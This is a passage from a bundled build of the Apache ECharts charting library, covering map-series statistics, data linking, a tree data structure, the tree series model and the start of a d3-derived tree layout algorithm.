var len = dataNameMap[mapKey].length;\n        for (var i = 0; i < len; i++) {\n            min = Math.min(min, dataNameMap[mapKey][i]);\n            max = Math.max(max, dataNameMap[mapKey][i]);\n            sum += dataNameMap[mapKey][i];\n        }\n        var result;\n        if (statisticType === 'min') {\n            result = min;\n        }\n        else if (statisticType === 'max') {\n            result = max;\n        }\n        else if (statisticType === 'average') {\n            result = sum / len;\n        }\n        else {\n            result = sum;\n        }\n        return len === 0 ? NaN : result;\n    });\n}\n\nvar mapDataStatistic = function (ecModel) {\n    var seriesGroups = {};\n    ecModel.eachSeriesByType('map', function (seriesModel) {\n        var hostGeoModel = seriesModel.getHostGeoModel();\n        var key = hostGeoModel ? 'o' + hostGeoModel.id : 'i' + seriesModel.getMapType();\n        (seriesGroups[key] = seriesGroups[key] || []).push(seriesModel);\n    });\n\n    each$1(seriesGroups, function (seriesList, key) {\n        var data = dataStatistics(\n            map(seriesList, function (seriesModel) {\n                return seriesModel.getData();\n            }),\n            seriesList[0].get('mapValueCalculation')\n        );\n\n        for (var i = 0; i < seriesList.length; i++) {\n            seriesList[i].originalData = seriesList[i].getData();\n        }\n\n        // FIXME Put where?\n        for (var i = 0; i < seriesList.length; i++) {\n            seriesList[i].seriesGroup = seriesList;\n            seriesList[i].needsDrawMap = i === 0 && !seriesList[i].getHostGeoModel();\n\n            seriesList[i].setData(data.cloneShallow());\n            seriesList[i].mainSeries = seriesList[0];\n        }\n    });\n};\n\n/*\n* Licensed to the Apache Software Foundation (ASF) under one\n* or more contributor license agreements.  See the NOTICE file\n* distributed with this work for additional information\n* regarding copyright ownership.  The ASF licenses this file\n* to you under the Apache License, Version 2.0 (the\n* \"License\"); you may not use this file except in compliance\n* with the License.  You may obtain a copy of the License at\n*\n*   http://www.apache.org/licenses/LICENSE-2.0\n*\n* Unless required by applicable law or agreed to in writing,\n* software distributed under the License is distributed on an\n* \"AS IS\" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY\n* KIND, either express or implied.  See the License for the\n* specific language governing permissions and limitations\n* under the License.\n*/\n\nvar backwardCompat$2 = function (option) {\n    // Save geoCoord\n    var mapSeries = [];\n    each$1(option.series, function (seriesOpt) {\n        if (seriesOpt && seriesOpt.type === 'map') {\n            mapSeries.push(seriesOpt);\n            seriesOpt.map = seriesOpt.map || seriesOpt.mapType;\n            // Put x, y, width, height, x2, y2 in the top level\n            defaults(seriesOpt, seriesOpt.mapLocation);\n        }\n    });\n};\n\n/*\n* Licensed to the Apache Software Foundation (ASF) under one\n* or more contributor license agreements.  See the NOTICE file\n* distributed with this work for additional information\n* regarding copyright ownership.  The ASF licenses this file\n* to you under the Apache License, Version 2.0 (the\n* \"License\"); you may not use this file except in compliance\n* with the License.  You may obtain a copy of the License at\n*\n*   http://www.apache.org/licenses/LICENSE-2.0\n*\n* Unless required by applicable law or agreed to in writing,\n* software distributed under the License is distributed on an\n* \"AS IS\" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY\n* KIND, either express or implied.  See the License for the\n* specific language governing permissions and limitations\n* under the License.\n*/\n\nregisterLayout(mapSymbolLayout);\nregisterVisual(mapVisual);\nregisterProcessor(PRIORITY.PROCESSOR.STATISTIC, mapDataStatistic);\nregisterPreprocessor(backwardCompat$2);\n\ncreateDataSelectAction('map', [{\n    type: 'mapToggleSelect',\n    event: 'mapselectchanged',\n    method: 'toggleSelected'\n}, {\n    type: 'mapSelect',\n    event: 'mapselected',\n    method: 'select'\n}, {\n    type: 'mapUnSelect',\n    event: 'mapunselected',\n    method: 'unSelect'\n}]);\n\n/*\n* Licensed to the Apache Software Foundation (ASF) under one\n* or more contributor license agreements.  See the NOTICE file\n* distributed with this work for additional information\n* regarding copyright ownership.  The ASF licenses this file\n* to you under the Apache License, Version 2.0 (the\n* \"License\"); you may not use this file except in compliance\n* with the License.  You may obtain a copy of the License at\n*\n*   http://www.apache.org/licenses/LICENSE-2.0\n*\n* Unless required by applicable law or agreed to in writing,\n* software distributed under the License is distributed on an\n* \"AS IS\" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY\n* KIND, either express or implied.  See the License for the\n* specific language governing permissions and limitations\n* under the License.\n*/\n\n/**\n * Link lists and struct (graph or tree)\n */\n\nvar each$7 = each$1;\n\nvar DATAS = '\\0__link_datas';\nvar MAIN_DATA = '\\0__link_mainData';\n\n// Caution:\n// In most case, either list or its shallow clones (see list.cloneShallow)\n// is active in echarts process. So considering heap memory consumption,\n// we do not clone tree or graph, but share them among list and its shallow clones.\n// But in some rare case, we have to keep old list (like do animation in chart). So\n// please take care that both the old list and the new list share the same tree/graph.\n\n/**\n * @param {Object} opt\n * @param {module:echarts/data/List} opt.mainData\n * @param {Object} [opt.struct] For example, instance of Graph or Tree.\n * @param {string} [opt.structAttr] designation: list[structAttr] = struct;\n * @param {Object} [opt.datas] {dataType: data},\n *                 like: {node: nodeList, edge: edgeList}.\n *                 Should contain mainData.\n * @param {Object} [opt.datasAttr] {dataType: attr},\n *                 designation: struct[datasAttr[dataType]] = list;\n */\nfunction linkList(opt) {\n    var mainData = opt.mainData;\n    var datas = opt.datas;\n\n    if (!datas) {\n        datas = {main: mainData};\n        opt.datasAttr = {main: 'data'};\n    }\n    opt.datas = opt.mainData = null;\n\n    linkAll(mainData, datas, opt);\n\n    // Porxy data original methods.\n    each$7(datas, function (data) {\n        each$7(mainData.TRANSFERABLE_METHODS, function (methodName) {\n            data.wrapMethod(methodName, curry(transferInjection, opt));\n        });\n\n    });\n\n    // Beyond transfer, additional features should be added to `cloneShallow`.\n    mainData.wrapMethod('cloneShallow', curry(cloneShallowInjection, opt));\n\n    // Only mainData trigger change, because struct.update may trigger\n    // another changable methods, which may bring about dead lock.\n    each$7(mainData.CHANGABLE_METHODS, function (methodName) {\n        mainData.wrapMethod(methodName, curry(changeInjection, opt));\n    });\n\n    // Make sure datas contains mainData.\n    assert$1(datas[mainData.dataType] === mainData);\n}\n\nfunction transferInjection(opt, res) {\n    if (isMainData(this)) {\n        // Transfer datas to new main data.\n        var datas = extend({}, this[DATAS]);\n        datas[this.dataType] = res;\n        linkAll(res, datas, opt);\n    }\n    else {\n        // Modify the reference in main data to point newData.\n        linkSingle(res, this.dataType, this[MAIN_DATA], opt);\n    }\n    return res;\n}\n\nfunction changeInjection(opt, res) {\n    opt.struct && opt.struct.update(this);\n    return res;\n}\n\nfunction cloneShallowInjection(opt, res) {\n    // cloneShallow, which brings about some fragilities, may be inappropriate\n    // to be exposed as an API. So for implementation simplicity we can make\n    // the restriction that cloneShallow of not-mainData should not be invoked\n    // outside, but only be invoked here.\n    each$7(res[DATAS], function (data, dataType) {\n        data !== res && linkSingle(data.cloneShallow(), dataType, res, opt);\n    });\n    return res;\n}\n\n/**\n * Supplement method to List.\n *\n * @public\n * @param {string} [dataType] If not specified, return mainData.\n * @return {module:echarts/data/List}\n */\nfunction getLinkedData(dataType) {\n    var mainData = this[MAIN_DATA];\n    return (dataType == null || mainData == null)\n        ? mainData\n        : mainData[DATAS][dataType];\n}\n\nfunction isMainData(data) {\n    return data[MAIN_DATA] === data;\n}\n\nfunction linkAll(mainData, datas, opt) {\n    mainData[DATAS] = {};\n    each$7(datas, function (data, dataType) {\n        linkSingle(data, dataType, mainData, opt);\n    });\n}\n\nfunction linkSingle(data, dataType, mainData, opt) {\n    mainData[DATAS][dataType] = data;\n    data[MAIN_DATA] = mainData;\n    data.dataType = dataType;\n\n    if (opt.struct) {\n        data[opt.structAttr] = opt.struct;\n        opt.struct[opt.datasAttr[dataType]] = data;\n    }\n\n    // Supplement method.\n    data.getLinkedData = getLinkedData;\n}\n\n/*\n* Licensed to the Apache Software Foundation (ASF) under one\n* or more contributor license agreements.  See the NOTICE file\n* distributed with this work for additional information\n* regarding copyright ownership.  The ASF licenses this file\n* to you under the Apache License, Version 2.0 (the\n* \"License\"); you may not use this file except in compliance\n* with the License.  You may obtain a copy of the License at\n*\n*   http://www.apache.org/licenses/LICENSE-2.0\n*\n* Unless required by applicable law or agreed to in writing,\n* software distributed under the License is distributed on an\n* \"AS IS\" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY\n* KIND, either express or implied.  See the License for the\n* specific language governing permissions and limitations\n* under the License.\n*/\n\n/**\n * Tree data structure\n *\n * @module echarts/data/Tree\n */\n\n/**\n * @constructor module:echarts/data/Tree~TreeNode\n * @param {string} name\n * @param {module:echarts/data/Tree} hostTree\n */\nvar TreeNode = function (name, hostTree) {\n    /**\n     * @type {string}\n     */\n    this.name = name || '';\n\n    /**\n     * Depth of node\n     *\n     * @type {number}\n     * @readOnly\n     */\n    this.depth = 0;\n\n    /**\n     * Height of the subtree rooted at this node.\n     * @type {number}\n     * @readOnly\n     */\n    this.height = 0;\n\n    /**\n     * @type {module:echarts/data/Tree~TreeNode}\n     * @readOnly\n     */\n    this.parentNode = null;\n\n    /**\n     * Reference to list item.\n     * Do not persistent dataIndex outside,\n     * besause it may be changed by list.\n     * If dataIndex -1,\n     * this node is logical deleted (filtered) in list.\n     *\n     * @type {Object}\n     * @readOnly\n     */\n    this.dataIndex = -1;\n\n    /**\n     * @type {Array.<module:echarts/data/Tree~TreeNode>}\n     * @readOnly\n     */\n    this.children = [];\n\n    /**\n     * @type {Array.<module:echarts/data/Tree~TreeNode>}\n     * @pubilc\n     */\n    this.viewChildren = [];\n\n    /**\n     * @type {moduel:echarts/data/Tree}\n     * @readOnly\n     */\n    this.hostTree = hostTree;\n};\n\nTreeNode.prototype = {\n\n    constructor: TreeNode,\n\n    /**\n     * The node is removed.\n     * @return {boolean} is removed.\n     */\n    isRemoved: function () {\n        return this.dataIndex < 0;\n    },\n\n    /**\n     * Travel this subtree (include this node).\n     * Usage:\n     *    node.eachNode(function () { ... }); // preorder\n     *    node.eachNode('preorder', function () { ... }); // preorder\n     *    node.eachNode('postorder', function () { ... }); // postorder\n     *    node.eachNode(\n     *        {order: 'postorder', attr: 'viewChildren'},\n     *        function () { ... }\n     *    ); // postorder\n     *\n     * @param {(Object|string)} options If string, means order.\n     * @param {string=} options.order 'preorder' or 'postorder'\n     * @param {string=} options.attr 'children' or 'viewChildren'\n     * @param {Function} cb If in preorder and return false,\n     *                      its subtree will not be visited.\n     * @param {Object} [context]\n     */\n    eachNode: function (options, cb, context) {\n        if (typeof options === 'function') {\n            context = cb;\n            cb = options;\n            options = null;\n        }\n\n        options = options || {};\n        if (isString(options)) {\n            options = {order: options};\n        }\n\n        var order = options.order || 'preorder';\n        var children = this[options.attr || 'children'];\n\n        var suppressVisitSub;\n        order === 'preorder' && (suppressVisitSub = cb.call(context, this));\n\n        for (var i = 0; !suppressVisitSub && i < children.length; i++) {\n            children[i].eachNode(options, cb, context);\n        }\n\n        order === 'postorder' && cb.call(context, this);\n    },\n\n    /**\n     * Update depth and height of this subtree.\n     *\n     * @param  {number} depth\n     */\n    updateDepthAndHeight: function (depth) {\n        var height = 0;\n        this.depth = depth;\n        for (var i = 0; i < this.children.length; i++) {\n            var child = this.children[i];\n            child.updateDepthAndHeight(depth + 1);\n            if (child.height > height) {\n                height = child.height;\n            }\n        }\n        this.height = height + 1;\n    },\n\n    /**\n     * @param  {string} id\n     * @return {module:echarts/data/Tree~TreeNode}\n     */\n    getNodeById: function (id) {\n        if (this.getId() === id) {\n            return this;\n        }\n        for (var i = 0, children = this.children, len = children.length; i < len; i++) {\n            var res = children[i].getNodeById(id);\n            if (res) {\n                return res;\n            }\n        }\n    },\n\n    /**\n     * @param {module:echarts/data/Tree~TreeNode} node\n     * @return {boolean}\n     */\n    contains: function (node) {\n        if (node === this) {\n            return true;\n        }\n        for (var i = 0, children = this.children, len = children.length; i < len; i++) {\n            var res = children[i].contains(node);\n            if (res) {\n                return res;\n            }\n        }\n    },\n\n    /**\n     * @param {boolean} includeSelf Default false.\n     * @return {Array.<module:echarts/data/Tree~TreeNode>} order: [root, child, grandchild, ...]\n     */\n    getAncestors: function (includeSelf) {\n        var ancestors = [];\n        var node = includeSelf ? this : this.parentNode;\n        while (node) {\n            ancestors.push(node);\n            node = node.parentNode;\n        }\n        ancestors.reverse();\n        return ancestors;\n    },\n\n    /**\n     * @param {string|Array=} [dimension='value'] Default 'value'. can be 0, 1, 2, 3\n     * @return {number} Value.\n     */\n    getValue: function (dimension) {\n        var data = this.hostTree.data;\n        return data.get(data.getDimension(dimension || 'value'), this.dataIndex);\n    },\n\n    /**\n     * @param {Object} layout\n     * @param {boolean=} [merge=false]\n     */\n    setLayout: function (layout, merge$$1) {\n        this.dataIndex >= 0\n            && this.hostTree.data.setItemLayout(this.dataIndex, layout, merge$$1);\n    },\n\n    /**\n     * @return {Object} layout\n     */\n    getLayout: function () {\n        return this.hostTree.data.getItemLayout(this.dataIndex);\n    },\n\n    /**\n     * @param {string} [path]\n     * @return {module:echarts/model/Model}\n     */\n    getModel: function (path) {\n        if (this.dataIndex < 0) {\n            return;\n        }\n        var hostTree = this.hostTree;\n        var itemModel = hostTree.data.getItemModel(this.dataIndex);\n        var levelModel = this.getLevelModel();\n        var leavesModel;\n        if (!levelModel && (this.children.length === 0 || (this.children.length !== 0 && this.isExpand === false))) {\n            leavesModel = this.getLeavesModel();\n        }\n        return itemModel.getModel(path, (levelModel || leavesModel || hostTree.hostModel).getModel(path));\n    },\n\n    /**\n     * @return {module:echarts/model/Model}\n     */\n    getLevelModel: function () {\n        return (this.hostTree.levelModels || [])[this.depth];\n    },\n\n    /**\n     * @return {module:echarts/model/Model}\n     */\n    getLeavesModel: function () {\n        return this.hostTree.leavesModel;\n    },\n\n    /**\n     * @example\n     *  setItemVisual('color', color);\n     *  setItemVisual({\n     *      'color': color\n     *  });\n     */\n    setVisual: function (key, value) {\n        this.dataIndex >= 0\n            && this.hostTree.data.setItemVisual(this.dataIndex, key, value);\n    },\n\n    /**\n     * Get item visual\n     */\n    getVisual: function (key, ignoreParent) {\n        return this.hostTree.data.getItemVisual(this.dataIndex, key, ignoreParent);\n    },\n\n    /**\n     * @public\n     * @return {number}\n     */\n    getRawIndex: function () {\n        return this.hostTree.data.getRawIndex(this.dataIndex);\n    },\n\n    /**\n     * @public\n     * @return {string}\n     */\n    getId: function () {\n        return this.hostTree.data.getId(this.dataIndex);\n    },\n\n    /**\n     * if this is an ancestor of another node\n     *\n     * @public\n     * @param {TreeNode} node another node\n     * @return {boolean} if is ancestor\n     */\n    isAncestorOf: function (node) {\n        var parent = node.parentNode;\n        while (parent) {\n            if (parent === this) {\n                return true;\n            }\n            parent = parent.parentNode;\n        }\n        return false;\n    },\n\n    /**\n     * if this is an descendant of another node\n     *\n     * @public\n     * @param {TreeNode} node another node\n     * @return {boolean} if is descendant\n     */\n    isDescendantOf: function (node) {\n        return node !== this && node.isAncestorOf(this);\n    }\n};\n\n/**\n * @constructor\n * @alias module:echarts/data/Tree\n * @param {module:echarts/model/Model} hostModel\n * @param {Array.<Object>} levelOptions\n * @param {Object} leavesOption\n */\nfunction Tree(hostModel, levelOptions, leavesOption) {\n    /**\n     * @type {module:echarts/data/Tree~TreeNode}\n     * @readOnly\n     */\n    this.root;\n\n    /**\n     * @type {module:echarts/data/List}\n     * @readOnly\n     */\n    this.data;\n\n    /**\n     * Index of each item is the same as the raw index of coresponding list item.\n     * @private\n     * @type {Array.<module:echarts/data/Tree~TreeNode}\n     */\n    this._nodes = [];\n\n    /**\n     * @private\n     * @readOnly\n     * @type {module:echarts/model/Model}\n     */\n    this.hostModel = hostModel;\n\n    /**\n     * @private\n     * @readOnly\n     * @type {Array.<module:echarts/model/Model}\n     */\n    this.levelModels = map(levelOptions || [], function (levelDefine) {\n        return new Model(levelDefine, hostModel, hostModel.ecModel);\n    });\n\n    this.leavesModel = new Model(leavesOption || {}, hostModel, hostModel.ecModel);\n}\n\nTree.prototype = {\n\n    constructor: Tree,\n\n    type: 'tree',\n\n    /**\n     * Travel this subtree (include this node).\n     * Usage:\n     *    node.eachNode(function () { ... }); // preorder\n     *    node.eachNode('preorder', function () { ... }); // preorder\n     *    node.eachNode('postorder', function () { ... }); // postorder\n     *    node.eachNode(\n     *        {order: 'postorder', attr: 'viewChildren'},\n     *        function () { ... }\n     *    ); // postorder\n     *\n     * @param {(Object|string)} options If string, means order.\n     * @param {string=} options.order 'preorder' or 'postorder'\n     * @param {string=} options.attr 'children' or 'viewChildren'\n     * @param {Function} cb\n     * @param {Object}   [context]\n     */\n    eachNode: function (options, cb, context) {\n        this.root.eachNode(options, cb, context);\n    },\n\n    /**\n     * @param {number} dataIndex\n     * @return {module:echarts/data/Tree~TreeNode}\n     */\n    getNodeByDataIndex: function (dataIndex) {\n        var rawIndex = this.data.getRawIndex(dataIndex);\n        return this._nodes[rawIndex];\n    },\n\n    /**\n     * @param {string} name\n     * @return {module:echarts/data/Tree~TreeNode}\n     */\n    getNodeByName: function (name) {\n        return this.root.getNodeByName(name);\n    },\n\n    /**\n     * Update item available by list,\n     * when list has been performed options like 'filterSelf' or 'map'.\n     */\n    update: function () {\n        var data = this.data;\n        var nodes = this._nodes;\n\n        for (var i = 0, len = nodes.length; i < len; i++) {\n            nodes[i].dataIndex = -1;\n        }\n\n        for (var i = 0, len = data.count(); i < len; i++) {\n            nodes[data.getRawIndex(i)].dataIndex = i;\n        }\n    },\n\n    /**\n     * Clear all layouts\n     */\n    clearLayouts: function () {\n        this.data.clearItemLayouts();\n    }\n};\n\n/**\n * data node format:\n * {\n *     name: ...\n *     value: ...\n *     children: [\n *         {\n *             name: ...\n *             value: ...\n *             children: ...\n *         },\n *         ...\n *     ]\n * }\n *\n * @static\n * @param {Object} dataRoot Root node.\n * @param {module:echarts/model/Model} hostModel\n * @param {Object} treeOptions\n * @param {Array.<Object>} treeOptions.levels\n * @param {Array.<Object>} treeOptions.leaves\n * @return module:echarts/data/Tree\n */\nTree.createTree = function (dataRoot, hostModel, treeOptions, beforeLink) {\n\n    var tree = new Tree(hostModel, treeOptions.levels, treeOptions.leaves);\n    var listData = [];\n    var dimMax = 1;\n\n    buildHierarchy(dataRoot);\n\n    function buildHierarchy(dataNode, parentNode) {\n        var value = dataNode.value;\n        dimMax = Math.max(dimMax, isArray(value) ? value.length : 1);\n\n        listData.push(dataNode);\n\n        var node = new TreeNode(dataNode.name, tree);\n        parentNode\n            ? addChild(node, parentNode)\n            : (tree.root = node);\n\n        tree._nodes.push(node);\n\n        var children = dataNode.children;\n        if (children) {\n            for (var i = 0; i < children.length; i++) {\n                buildHierarchy(children[i], node);\n            }\n        }\n    }\n\n    tree.root.updateDepthAndHeight(0);\n\n    var dimensionsInfo = createDimensions(listData, {\n        coordDimensions: ['value'],\n        dimensionsCount: dimMax\n    });\n\n    var list = new List(dimensionsInfo, hostModel);\n    list.initData(listData);\n\n    linkList({\n        mainData: list,\n        struct: tree,\n        structAttr: 'tree'\n    });\n\n    tree.update();\n\n    beforeLink && beforeLink(list);\n\n    return tree;\n};\n\n/**\n * It is needed to consider the mess of 'list', 'hostModel' when creating a TreeNote,\n * so this function is not ready and not necessary to be public.\n *\n * @param {(module:echarts/data/Tree~TreeNode|Object)} child\n */\nfunction addChild(child, node) {\n    var children = node.children;\n    if (child.parentNode === node) {\n        return;\n    }\n\n    children.push(child);\n    child.parentNode = node;\n}\n\n/*\n* Licensed to the Apache Software Foundation (ASF) under one\n* or more contributor license agreements.  See the NOTICE file\n* distributed with this work for additional information\n* regarding copyright ownership.  The ASF licenses this file\n* to you under the Apache License, Version 2.0 (the\n* \"License\"); you may not use this file except in compliance\n* with the License.  You may obtain a copy of the License at\n*\n*   http://www.apache.org/licenses/LICENSE-2.0\n*\n* Unless required by applicable law or agreed to in writing,\n* software distributed under the License is distributed on an\n* \"AS IS\" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY\n* KIND, either express or implied.  See the License for the\n* specific language governing permissions and limitations\n* under the License.\n*/\n\nSeriesModel.extend({\n\n    type: 'series.tree',\n\n    layoutInfo: null,\n\n    // can support the position parameters 'left', 'top','right','bottom', 'width',\n    // 'height' in the setOption() with 'merge' mode normal.\n    layoutMode: 'box',\n\n    /**\n     * Init a tree data structure from data in option series\n     * @param  {Object} option  the object used to config echarts view\n     * @return {module:echarts/data/List} storage initial data\n     */\n    getInitialData: function (option) {\n\n        //create an virtual root\n        var root = {name: option.name, children: option.data};\n\n        var leaves = option.leaves || {};\n\n        var treeOption = {};\n\n        treeOption.leaves = leaves;\n\n        var tree = Tree.createTree(root, this, treeOption, beforeLink);\n\n        function beforeLink(nodeData) {\n            nodeData.wrapMethod('getItemModel', function (model, idx) {\n                var node = tree.getNodeByDataIndex(idx);\n                var leavesModel = node.getLeavesModel();\n                if (!node.children.length || !node.isExpand) {\n                    model.parentModel = leavesModel;\n                }\n                return model;\n            });\n        }\n\n        var treeDepth = 0;\n\n        tree.eachNode('preorder', function (node) {\n            if (node.depth > treeDepth) {\n                treeDepth = node.depth;\n            }\n        });\n\n        var expandAndCollapse = option.expandAndCollapse;\n        var expandTreeDepth = (expandAndCollapse && option.initialTreeDepth >= 0)\n            ? option.initialTreeDepth : treeDepth;\n\n        tree.root.eachNode('preorder', function (node) {\n            var item = node.hostTree.data.getRawDataItem(node.dataIndex);\n            // Add item.collapsed != null, because users can collapse node original in the series.data.\n            node.isExpand = (item && item.collapsed != null)\n                ? !item.collapsed\n                : node.depth <= expandTreeDepth;\n        });\n\n        return tree.data;\n    },\n\n    /**\n     * Make the configuration 'orient' backward compatibly, with 'horizontal = LR', 'vertical = TB'.\n     * @returns {string} orient\n     */\n    getOrient: function () {\n        var orient = this.get('orient');\n        if (orient === 'horizontal') {\n            orient = 'LR';\n        }\n        else if (orient === 'vertical') {\n            orient = 'TB';\n        }\n        return orient;\n    },\n\n    setZoom: function (zoom) {\n        this.option.zoom = zoom;\n    },\n\n    setCenter: function (center) {\n        this.option.center = center;\n    },\n\n    /**\n     * @override\n     * @param {number} dataIndex\n     */\n    formatTooltip: function (dataIndex) {\n        var tree = this.getData().tree;\n        var realRoot = tree.root.children[0];\n        var node = tree.getNodeByDataIndex(dataIndex);\n        var value = node.getValue();\n        var name = node.name;\n        while (node && (node !== realRoot)) {\n            name = node.parentNode.name + '.' + name;\n            node = node.parentNode;\n        }\n        return encodeHTML(name + (\n            (isNaN(value) || value == null) ? '' : ' : ' + value\n        ));\n    },\n\n    defaultOption: {\n        zlevel: 0,\n        z: 2,\n        coordinateSystem: 'view',\n\n        // the position of the whole view\n        left: '12%',\n        top: '12%',\n        right: '12%',\n        bottom: '12%',\n\n        // the layout of the tree, two value can be selected, 'orthogonal' or 'radial'\n        layout: 'orthogonal',\n\n        // value can be 'polyline'\n        edgeShape: 'curve',\n\n        edgeForkPosition: '50%',\n\n        // true | false | 'move' | 'scale', see module:component/helper/RoamController.\n        roam: false,\n\n        // Symbol size scale ratio in roam\n        nodeScaleRatio: 0.4,\n\n        // Default on center of graph\n        center: null,\n\n        zoom: 1,\n\n        // The orient of orthoginal layout, can be setted to 'LR', 'TB', 'RL', 'BT'.\n        // and the backward compatibility configuration 'horizontal = LR', 'vertical = TB'.\n        orient: 'LR',\n\n        symbol: 'emptyCircle',\n\n        symbolSize: 7,\n\n        expandAndCollapse: true,\n\n        initialTreeDepth: 2,\n\n        lineStyle: {\n            color: '#ccc',\n            width: 1.5,\n            curveness: 0.5\n        },\n\n        itemStyle: {\n            color: 'lightsteelblue',\n            borderColor: '#c23531',\n            borderWidth: 1.5\n        },\n\n        label: {\n            show: true,\n            color: '#555'\n        },\n\n        leaves: {\n            label: {\n                show: true\n            }\n        },\n\n        animationEasing: 'linear',\n\n        animationDuration: 700,\n\n        animationDurationUpdate: 1000\n    }\n});\n\n/*\n* Licensed to the Apache Software Foundation (ASF) under one\n* or more contributor license agreements.  See the NOTICE file\n* distributed with this work for additional information\n* regarding copyright ownership.  The ASF licenses this file\n* to you under the Apache License, Version 2.0 (the\n* \"License\"); you may not use this file except in compliance\n* with the License.  You may obtain a copy of the License at\n*\n*   http://www.apache.org/licenses/LICENSE-2.0\n*\n* Unless required by applicable law or agreed to in writing,\n* software distributed under the License is distributed on an\n* \"AS IS\" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY\n* KIND, either express or implied.  See the License for the\n* specific language governing permissions and limitations\n* under the License.\n*/\n\n/*\n* A third-party license is embeded for some of the code in this file:\n* The tree layoutHelper implementation was originally copied from\n* \"d3.js\"(https://github.com/d3/d3-hierarchy) with\n* some modifications made for this project.\n* (see more details in the comment of the specific method below.)\n* The use of the source code of this file is also subject to the terms\n* and consitions of the licence of \"d3.js\" (BSD-3Clause, see\n* </licenses/LICENSE-d3>).\n*/\n\n/**\n * @file The layout algorithm of node-link tree diagrams. Here we using Reingold-Tilford algorithm to drawing\n *       the tree.\n */\n\n/**\n * Initialize all computational message for following algorithm.\n *\n * @param  {module:echarts/data/Tree~TreeNode} root   The virtual root of the tree.\n */\nfunction init$2(root) {\n    root.hierNode = {\n        defaultAncestor: null,\n        ancestor: root,\n        prelim: 0,\n        modifier: 0,\n        change: 0,\n        shift: 0,\n        i: 0,\n        thread: null\n    };\n\n    var nodes = [root];\n    var node;\n    var children;\n\n    while (node = nodes.pop()) { // jshint ignore:line\n        children = node.children;\n        if (node.isExpand && children.length) {\n            var n = children.length;\n            for (var i = n - 1; i >= 0; i--) {\n                var child = children[i];\n                child.hierNode = {\n                    defaultAncestor: null,\n                    ancestor: child,\n                    prelim: 0,\n                    modifier: 0,\n                    change: 0,\n                    shift: 0,\n                    i: i,\n                    thread: null\n                };\n                nodes.push(child);\n            }\n        }\n    }\n}\n\n/**\n * The implementation of this function was originally copied from \"d3.js\"\n * <https://github.com/d3/d3-hierarchy/blob/4c1f038f2725d6eae2e49b61d01456400694bac4/src/tree.js>\n * with some modifications made for this program.\n * See the license statement at the head of this file.\n *\n * Computes a preliminary x coordinate for node. Before that, this function is\n * applied recursively to the children of node, as well as the function\n * apportion(). After spacing out the children by calling executeShifts(), the\n * node is placed to the midpoint of its outermost children.\n *\n * @param  {module:echarts/data/Tree~TreeNode} node\n * @param {Function} separation\n */\nfunction firstWalk(node, separation) {\n    var children = node.isExpand ? node.children : [];\n    var siblings = node.parentNode.children;\n    var subtreeW = node.hierNode.i ? siblings[node.hierNode.i - 1] : null;\n    if (children.length) {\n        executeShifts(node);\n        var midPoint = (children[0].hierNode.prelim + children[children.length - 1].hierNode.prelim) / 2;\n        if (subtreeW) {\n            node.hierNode.prelim = subtreeW.hierNode.prelim + separation(node, subtreeW);\n            node.hierNode.modifier = node.hierNode.prelim - midPoint;\n        }\n        else {\n            node.hierNode.prelim = midPoint;\n        }\n    }\n    else if (subtreeW) {\n        node.hierNode.prelim = subtreeW.hierNode.prelim + separation(node, subtreeW);\n    }\n    node.parentNode.hierNode.defaultAncestor = apportion(\n        node,\n        subtreeW,\n        node.parentNode.hierNode.defaultAncestor || siblings[0],\n        separation\n    );\n}\n\n\n/**\n * The implementation of this function was originally copied from \"d3.js\"\n * <https://github.com/d3/d3-hierarchy/blob/4c1f038f2725d6eae2e49b61d01456400694bac4/src/tree.js>\n * with some modifications made for this program.\n * See the license statement at the head of this file.\n *\n * Computes all real x-coordinates by summing up the modifiers recursively.\n *\n * @param  {module:echarts/data/Tree~TreeNode} node\n */\nfunction secondWalk(node) {\n    var nodeX = node.hierNode.prelim + node.parentNode.hierNode.modifier;\n    node.setLayout({x: nodeX}, true);\n    node.hierNode.modifier += node.parentNode.hierNode.modifier;\n}\n\n\nfunction separation(cb) {\n    return arguments.length ? cb : defaultSeparation;\n}\n\n/**\n * Transform the common coordinate to radial coordinate.\n *\n * @param  {number} x\n * @param  {number} y\n * @return {Object}\n */\nfunction radialCoordinate(x, y) {\n    var radialCoor = {};\n    x -= Math.PI / 2;\n    radialCoor.x = y * Math.cos(x);\n    radialCoor.y = y * Math.sin(x);\n    return radialCoor;\n}\n\n/**\n * Get the layout position of the whole view.\n *\n * @param {module:echarts/model/Series} seriesModel  the model object of sankey series\n * @param {module:echarts/ExtensionAPI} api  provide the API list that the developer can call\n * @return {module:zrender/core/BoundingRect}  size of rect to draw the sankey view\n */\nfunction getViewRect$1(seriesModel, api) {\n    return getLayoutRect(\n        seriesModel.getBoxLayoutParams(), {\n            width: api.getWidth(),\n            height: api.getHeight()\n        }\n    );\n}\n\n/**\n * All other shifts, applied to the smaller subtrees between w- and w+, are\n * performed by this function.\n *\n * The implementation of this function was originally copied from \"d3.js\"\n * <https://github.com/d3/d3-hierarchy/blob/4c1f038f2725d6eae2e49b61d01456400694bac4/src/tree.js>\n * with some modifications made for this program.\n * See the license statement at the head of this file.\n *\n * @param  {module:echarts/data/Tree~TreeNode} node\n */\nfunction executeShifts(node) {\n    var children = node.children;\n    var n = children.length;\n    var shift = 0;\n    var change = 0;\n    while (--n >= 0) {\n        var child = children[n];\n        child.hierNode.prelim += shift;\n        child.hierNode.modifier += shift;\n        change += child.hierNode.change;\n        shift += child.hierNode.shift + change;\n    }\n}\n\n/**\n * The implementation of this function was originally copied from \"d3.js\"\n * <https://github.com/d3/d3-hierarchy/blob/4c1f038f2725d6eae2e49b61d01456400694bac4/src/tree.js>\n * with some modifications made for this program.\n * See the license statement at the head of this file.\n *\n * The core of the algorithm. Here, a new subtree is combined with the\n * previous subtrees. Threads are used to traverse the inside and outside\n * contours of the left and right subtree up to the highest common level.\n * Whenever two nodes of the inside contours conflict, we compute the left\n * one of the greatest uncommon ancestors using the function nextAncestor()\n * and call moveSubtree() to shift the subtree and prepare the shifts of\n * smaller subtrees. Finally, we add a new thread (if necessary).\n *\n * @param  {module:echarts/data/Tree~TreeNode} subtreeV\n * @param  {module:echarts/data/Tree~TreeNode} subtreeW\n * @param  {module:echarts/data/Tree~TreeNode} ancestor\n * @param  {Function} separation\n * @return 